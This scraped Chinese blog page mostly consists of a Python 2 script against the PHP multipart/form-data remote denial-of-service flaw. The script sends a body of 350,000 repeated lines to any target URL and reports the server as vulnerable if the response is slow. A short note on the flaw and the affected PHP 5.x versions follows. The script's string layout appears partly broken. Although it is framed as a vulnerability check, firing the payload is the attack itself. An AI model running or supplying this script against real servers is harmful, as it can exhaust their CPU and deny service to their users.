zoukankan      html  css  js  c++  java
  • PHP multipart/form-data 远程DOS漏洞

    import sys
    import urllib,urllib2
    import datetime
    from optparse import OptionParser
    def http_proxy(proxy_url):
        proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
        null_proxy_handler = urllib2.ProxyHandler({})
        opener = urllib2.build_opener(proxy_handler)
        urllib2.install_opener(opener)
    #end http_proxy
    def check_php_multipartform_dos(url,post_body,headers):
        req = urllib2.Request(url)
        for key in headers.keys():
            req.add_header(key,headers[key])
        starttime = datetime.datetime.now();
        fd = urllib2.urlopen(req,post_body)
        html = fd.read()
        endtime = datetime.datetime.now()
        usetime=(endtime - starttime).seconds
        if(usetime > 5):
            result = url+" is vulnerable";
        else:
            if(usetime > 3):
                result = "need to check normal respond time"
        return [result,usetime]
    #end
    def main():
        #http_proxy("http://127.0.0.1:8089")
        parser = OptionParser()
        parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
        (options, args) = parser.parse_args()
        if(options.target):
            target = options.target
        else:
            return;
        Num=350000
        headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
                'Accept-Encoding':'gzip, deflate',
                'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = 
    "------WebKitFormBoundaryX3B7rDMPcQlzmJE1
    Content-Disposition: 
    form-data; name="file"; filename=sp.jpg"
        payload=""
        for i in range(0,Num):
            payload = payload + "a
    "
        body = body + payload;
    body = body + 
    "Content-Type: application/octet-stream
    
    datadata
    ------
    WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
        print "starting...";
        respond=check_php_multipartform_dos(target,body,headers)
        print "Result : "
        print respond[0]
        print "Respond time : "+str(respond[1]) + " seconds";
    if __name__=="__main__":
        main()
    

      

    PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8

  • 相关阅读:
    通达信自动交易软件 z
    keybd_event跟SendMessage,PostMessage模拟键盘消息的区别 z
    55人班37人进清华北大的金牌教师之32条教育建言! z
    SafeHandle和Dispose z
    Path类型的扩展方法 z
    BinaryReader和BinaryWriter的leaveOpen参数 z
    SQL locate()函数
    MySQL 的instr函数
    新建实体的字段不能够是数据库的关键字
    JS isNaN()函数
  • 原文地址:https://www.cnblogs.com/endust/p/11983902.html
Copyright © 2011-2022 走看看